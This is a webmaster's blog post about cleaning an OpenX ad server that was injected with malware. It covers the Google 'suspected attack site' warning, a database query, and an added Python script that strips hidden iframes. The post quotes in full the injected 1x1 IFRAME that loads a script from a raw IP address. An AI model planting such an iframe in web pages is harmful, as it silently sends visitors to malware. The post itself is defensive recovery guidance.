OpenX Malware, Fix “Suspected Attack Site”
I have been using OpenX for a few years to serve banner ads on my Volkswagen website. OpenX has always been difficult to set up. Difficult, you know, like selling karaoke to Japan. Yes, that difficult. The interface isn’t intuitive for new users and getting a grasp on how everything ties together is a nightmare that even Freddy wouldn’t want. But that’s a different blog post.
About a month ago, I woke up in the morning and grabbed my trusty iPad to make sure none of my sites blew up during the 3 hours of sleep I usually get. Everything seemed fine. After visiting my “wake-up sites” (mostly porn), I went to my laptop and opened Firefox.
I see this:
Oh shit. This is every Administrator’s bad dream. Panic follows pretty quickly and you start to wonder what the hell happened. “Do I have a backup? Was I hacked? I hope all my data is there”.
Just tell me how I fix this
You don’t like my stories? Fine.
1) Request a review of your site
Click the “request a review” button. This will tell you a few key pieces of information. First, it showed that the malware was linked from two sites. GenerationMediaGroup and some crazy IP address that I’ve never seen before. Instantly I knew it had to be a hack in OpenX, as the only way GenerationDUB and GenerationMediaGroup connect is via this piece of software. This might not be the case for you if you are hosting OpenX on the same server as your site, but it will at least give you an idea of what to look for.
2) Disable OpenX
Turn off OpenX immediately. The longer you are a suspected attack site the more users you could infect, the worse your ranking gets on Google and the less trusted your site becomes. Your first and most important task is to disable or remove the infected piece of your site, and get it running again so that Google knows you have fixed it. We will worry about fixing / updating OpenX later.
3) Google Webmaster Tools
You might find the code in a matter of minutes, or you could spend hours searching every PHP / ASPX file on your server. Fortunately for me (and you, if you are using OpenX), the malware code disappears after you disable OpenX.
After you have removed the piece of code that is causing the issue, go to Google Webmaster Tools. This is the only way to quickly get your site removed from the “attackers” list. Sign up if you don’t have an account and add your website.
Click the diagnostics tab, then click malware.
In here you will be able to scan your site and make sure the code is gone. After a few hours, Google will restore your site status to normal and your users hopefully didn’t notice.
Ok, I’ve done all that. How do I get OpenX working again?
The first thing you will find when you search this problem is that installing the latest update of OpenX will solve your issue.
1) Download OpenX and follow their update instructions to the LETTER.
2) Manually edit your database.
Open MySQL and open your OpenX database. You can use phpMyAdmin for this, but I am using the MySQL Query Browser for Windows.
Open the “Banners” table and run a select statement to return all of your banner ads. If you prefixed your tables with something like “openx_”, then modify the select statement accordingly.
SELECT * FROM banners
Well look at that! The same IP address that is listed as the site serving the malware! Looks like a sneaky attack that has hidden an IFRAME (inline frame) in your banners. Now all you have to do is remove the IFRAME code and leave your regular code!
<IFRAME src="http://188.8.131.52/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></IFRAME>
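If you have more than a handful of banners, eyeballing every row is slow. Here is a small Python checker I added to illustrate the clean-up step (it is not part of OpenX and not the author’s code): it flags iframes that are 1x1 / 0x0 or that point straight at a raw IP address, strips them, and leaves the rest of the banner markup alone. The banner rows below are constructed sample data keyed by a made-up banner id; the IP-based src is the one shown above.

```python
import re

# Constructed sample rows: banner id -> banner HTML. Only 101 carries the
# hidden 1x1 IFRAME; 103 is a legitimate, full-size iframe that must survive.
SAMPLE_BANNERS = {
    101: '<a href="http://example.com/parts"><img src="/img/parts.gif" width="468" height="60"></a>'
         '<IFRAME src="http://188.8.131.52/tds/in.cgi?default" width="1" height="1" '
         'hspace="0" vspace="0" frameborder="0" scrolling="no"></IFRAME>',
    102: '<a href="http://example.com/wheels"><img src="/img/wheels.gif" width="468" height="60"></a>',
    103: '<iframe src="http://example.com/player" width="300" height="250"></iframe>',
}

# Match a whole <iframe ...>...</iframe> element (or a self-closing one), any case.
IFRAME_RE = re.compile(r'<iframe\b[^>]*>.*?</iframe\s*>|<iframe\b[^>]*/?>', re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
IP_HOST_RE = re.compile(r'^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)', re.IGNORECASE)

def _attrs(element):
    """Parse the attributes of the opening tag into a lower-cased dict."""
    opening = element.split('>', 1)[0]
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or '')
            for m in ATTR_RE.finditer(opening)}

def _dim(attrs, key):
    """Numeric width/height in px, or None if absent or not a plain number."""
    value = attrs.get(key)
    if value is None:
        return None
    try:
        return int(value.strip().lower().rstrip('px'))
    except ValueError:
        return None

def is_hidden_iframe(element):
    """Return a reason string if the iframe looks like a hidden redirector, else None."""
    a = _attrs(element)
    w, h = _dim(a, 'width'), _dim(a, 'height')
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return 'tiny_frame'      # 1x1 / 0x0 frames exist only to load something unseen
    if IP_HOST_RE.match(a.get('src', '')):
        return 'ip_src'          # ad networks use hostnames; a bare IP is a red flag
    return None

def clean_banner(html):
    """Strip hidden iframes from one banner's HTML; return (cleaned_html, reasons)."""
    reasons = []
    def repl(m):
        reason = is_hidden_iframe(m.group(0))
        if reason:
            reasons.append(reason)
            return ''
        return m.group(0)
    return IFRAME_RE.sub(repl, html), reasons

def scan_banners(banners):
    """Return {banner_id: (cleaned_html, reasons)} for every row that needs fixing."""
    return {bid: (cleaned, reasons) for bid, html in banners.items()
            for cleaned, reasons in [clean_banner(html)] if reasons}
```

Run it over the HTML column of each row from `SELECT * FROM banners`; the returned dict tells you which rows to update and what they should contain once the IFRAME is gone.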
That’s it! You’re all done and OpenX is ready to be enabled again. Sometimes it’s impossible to avoid these types of injections, but to stay on the safe side, make sure you update ALL of your open source products, OpenX, WordPress, etc. It’s best to sign up to the software provider’s mailing list so that you know when there are security issues that need to be addressed.
If you have any questions, the comment section is below.